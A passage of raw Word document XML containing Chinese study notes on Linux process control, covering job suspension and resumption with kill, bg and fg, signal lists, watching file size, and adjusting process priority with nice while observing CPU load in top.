        </w:rPr>
        <w:t>比如，将一个前台进程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ctrl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，然后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jobs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以看到该进程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406C376A" w14:textId="1002D476" w:rsidR="00B9708F" w:rsidRDefault="005B0975" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="007218AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>kill</w:t>
      </w:r>
      <w:r w:rsidRPr="007218AF">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> -18 %1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E13276" w14:textId="77777777" w:rsidR="00B9708F" w:rsidRDefault="00B9708F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2713F08E" w14:textId="72D4D1E4" w:rsidR="005B0975" w:rsidRDefault="005B0975" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一秒看一次这个文件的大小</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2259BA80" w14:textId="6369FE2C" w:rsidR="00B9708F" w:rsidRDefault="005B0975" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>watch</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -n 1 du -sh test-file </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67548DF9" w14:textId="77777777" w:rsidR="00B9708F" w:rsidRDefault="00B9708F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31D7829E" w14:textId="557465E7" w:rsidR="00B9708F" w:rsidRDefault="00A54C0F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>kill</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -l </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以看到各种各样的信号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BAB639" w14:textId="3BA1283D" w:rsidR="00B9708F" w:rsidRDefault="00A54C0F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
      <w:r>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是恢复，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是停止（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>stop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CED85D8" w14:textId="77777777" w:rsidR="00B9708F" w:rsidRPr="00A54C0F" w:rsidRDefault="00B9708F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F3480D7" w14:textId="265AA3FF" w:rsidR="00B9708F" w:rsidRDefault="00B54AA6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bg</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> %1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是让</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jobs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>任务从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>STOP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>状态正常运行</w:t>
      </w:r>
      <w:r w:rsidR="000F71A8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（注意，不是把进程放到后台的意思，是恢复运行，变为</w:t>
      </w:r>
      <w:r w:rsidR="000F71A8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Running</w:t>
      </w:r>
      <w:r w:rsidR="000F71A8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>状态）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0463C6" w14:textId="67387431" w:rsidR="00B54AA6" w:rsidRDefault="00B54AA6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fg</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> %1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是让</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jobs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>任务恢复到前台</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3F9BFB" w14:textId="77777777" w:rsidR="00B9708F" w:rsidRDefault="00B9708F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F4FF142" w14:textId="5B5A2357" w:rsidR="00B9708F" w:rsidRDefault="000B5A9E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调整进程优先级</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E73B3B" w14:textId="77777777" w:rsidR="00B9708F" w:rsidRDefault="00B9708F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49D8207F" w14:textId="3E0DBEB8" w:rsidR="00B9708F" w:rsidRDefault="000B5A9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>core</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的意思，最大允许</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个进程同时使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>00%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DD0A84" w14:textId="162D867E" w:rsidR="000B5A9E" w:rsidRDefault="000B5A9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>假如说</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个进程需要运行，且</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个进程都需要占用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>00%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如果你觉得哪个进程需要快速结束，那么就调整这个进程的优先级。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29089581" w14:textId="77777777" w:rsidR="000B5A9E" w:rsidRDefault="000B5A9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14130B05" w14:textId="2E2CAA5C" w:rsidR="000B5A9E" w:rsidRDefault="000B5A9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程运行时就指定优先级</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F18AE2" w14:textId="4C506E72" w:rsidR="000B5A9E" w:rsidRDefault="000B5A9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调整一个已经运行进程的优先级</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5923EC19" w14:textId="77777777" w:rsidR="000B5A9E" w:rsidRDefault="000B5A9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="014284DA" w14:textId="49F64C6A" w:rsidR="000B5A9E" w:rsidRDefault="000B5A9E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r>
        <w:t>cpu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看当前</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03638EB8" w14:textId="77777777" w:rsidR="00B9708F" w:rsidRPr="000B5A9E" w:rsidRDefault="00B9708F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D66CF82" w14:textId="77777777" w:rsidR="00B9708F" w:rsidRDefault="00B9708F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C337D94" w14:textId="620D44BF" w:rsidR="00B9708F" w:rsidRDefault="0029173D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32134FFE" wp14:editId="2A3525A2">
            <wp:extent cx="5274310" cy="2542540"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="129149099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90998" name="图片 1" descr="图形用户界面, 应用程序&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId66"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2542540"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6557F4" w14:textId="0A90638F" w:rsidR="00B9708F" w:rsidRDefault="0029173D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">at /dev/zero &gt;&gt; /dev/null </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令，可以让一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>负荷是百分之百</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A798BF" w14:textId="4DD2B04B" w:rsidR="0029173D" w:rsidRDefault="0029173D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多开几个这样的后台命令，可以观察到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的符合多几个百分之百</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC14431" w14:textId="77777777" w:rsidR="0029173D" w:rsidRDefault="0029173D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EB2E849" w14:textId="2BBF4910" w:rsidR="0029173D" w:rsidRDefault="0029173D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>top</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -d 1 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>秒刷新一次</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>top</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1C57FB" w14:textId="29377E0F" w:rsidR="0029173D" w:rsidRDefault="0029173D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50EBD52C" wp14:editId="4ACB1BE9">
            <wp:extent cx="5274310" cy="2499360"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1798013242"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13242" name="图片 1" descr="表格&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId67"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2499360"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EC0688" w14:textId="0A23FC9B" w:rsidR="00B9708F" w:rsidRDefault="0029173D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此处虽然多个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的高占比，但是加起来是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>00%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，取决于多少个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FAEDF8" w14:textId="77777777" w:rsidR="0029173D" w:rsidRDefault="0029173D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4701978C" w14:textId="46676024" w:rsidR="0029173D" w:rsidRDefault="0029173D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nice</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nice</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -n 10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）后台命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5D6C6D" w14:textId="26DDABCC" w:rsidR="0029173D" w:rsidRDefault="0029173D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2114717A" wp14:editId="7E5DCFF4">
            <wp:extent cx="5274310" cy="2832100"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="334680639"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80639" name="图片 1" descr="手机屏幕截图&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId68"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2832100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="148F9614" w14:textId="09EC7839" w:rsidR="0029173D" w:rsidRDefault="0029173D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以看到这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跟不上节奏的感觉，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>值越低，优先级越高</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027DA104" w14:textId="77777777" w:rsidR="0029173D" w:rsidRDefault="0029173D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5519F6D1" w14:textId="0AA9E58D" w:rsidR="0029173D" w:rsidRDefault="0029173D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0029173D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>关于优先级，</w:t>
      </w:r>
      <w:r w:rsidRPr="0029173D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>PR</w:t>
      </w:r>
      <w:r w:rsidRPr="0029173D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>（优先级）</w:t>
      </w:r>
      <w:r w:rsidRPr="0029173D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0029173D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="0029173D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Nice</w:t>
      </w:r>
      <w:r w:rsidRPr="0029173D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> == 20 </w:t>
      </w:r>
      <w:r w:rsidRPr="0029173D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，如果你手动</w:t>
      </w:r>
      <w:r w:rsidRPr="0029173D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>nice</w:t>
      </w:r>
      <w:r w:rsidRPr="0029173D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> -10</w:t>
      </w:r>
      <w:r w:rsidRPr="0029173D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，那么</w:t>
      </w:r>
      <w:r w:rsidRPr="0029173D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>PR</w:t>
      </w:r>
      <w:r w:rsidRPr="0029173D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>就是</w:t>
      </w:r>
      <w:r w:rsidRPr="0029173D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="0029173D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00C019F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="00C019F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>PR</w:t>
      </w:r>
      <w:r w:rsidR="00C019F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>是优先级，比</w:t>
      </w:r>
      <w:r w:rsidR="00C019F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>NI</w:t>
      </w:r>
      <w:r w:rsidR="00C019F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>高</w:t>
      </w:r>
      <w:r w:rsidR="00C019F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00C019F1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00C019F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的原则，直到</w:t>
      </w:r>
      <w:r w:rsidR="00C019F1" w:rsidRPr="00C019F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>下限为</w:t>
      </w:r>
      <w:r w:rsidR="00C019F1" w:rsidRPr="00C019F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00C019F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>优先级越大，越不优先</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5606601C" w14:textId="77777777" w:rsidR="0029173D" w:rsidRDefault="0029173D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D3F0566" w14:textId="2AC76703" w:rsidR="0029173D" w:rsidRDefault="0029173D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
